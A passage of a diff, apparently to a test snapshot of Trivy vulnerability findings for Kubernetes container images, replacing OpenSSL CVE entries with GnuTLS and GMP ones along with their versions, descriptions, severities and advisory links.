pointer dereference in X509_issuer_and_serial_hash()", + "name": "Integer overflow and resultant buffer overflow via crafted input", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2021-43618", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "http://seclists.org/fulldisclosure/2022/Oct/8", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "http://www.openwall.com/lists/oss-security/2022/10/13/3", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://access.redhat.com/security/cve/CVE-2021-43618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://bugs.debian.org/994405", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://gmplib.org/list-archives/gmp-bugs/2021-September/005077.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://gmplib.org/repo/gmp-6.2/rev/561a9c25298e", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00001.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43618", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://security.netapp.com/advisory/ntap-20221111-0001/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://ubuntu.com/security/notices/USN-5672-1", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://ubuntu.com/security/notices/USN-5672-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43618", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20231", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-20231", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20231.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20231", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in gnutls. A use after free issue in client sending key_share extension may lead to memory corruption and other consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnutls: Use after free in client key_share extension", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-20231", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://access.redhat.com/security/cve/CVE-2021-20231", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20231.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", - ], - }, - "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20231", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20231", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20232", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-20232", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://gitlab.com/gnutls/gnutls/-/issues/1151", + "https://linux.oracle.com/cve/CVE-2021-20232.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", + "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", + "https://security.netapp.com/advisory/ntap-20210416-0005/", + "https://ubuntu.com/security/notices/USN-5029-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20232", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in gnutls. A use after free issue in client_send_params in lib/ext/pre_shared_key.c may lead to memory corruption and other potential consequences.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnutls: Use after free in client_send_params in lib/ext/pre_shared_key.c", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://avd.aquasec.com/nvd/cve-2021-20232", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://access.redhat.com/security/cve/CVE-2021-20232", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", + }, + { + "type": "URL", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23839", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-24659", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23839", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://www.cve.org/CVERecord?id=CVE-2021-23839", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", + "https://access.redhat.com/security/cve/CVE-2020-24659", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "https://linux.oracle.com/cve/CVE-2020-24659.html", + "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "https://security.gentoo.org/glsa/202009-01", + "https://security.netapp.com/advisory/ntap-20200911-0006/", + "https://ubuntu.com/security/notices/USN-4491-1", + "https://usn.ubuntu.com/4491-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", ], }, "category": "Vulnerability", - "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: incorrect SSLv2 rollback protection", + "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23839", + "value": "https://avd.aquasec.com/nvd/cve-2020-24659", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23839", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "value": "https://access.redhat.com/security/cve/CVE-2020-24659", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", }, { "type": "URL", - "value": 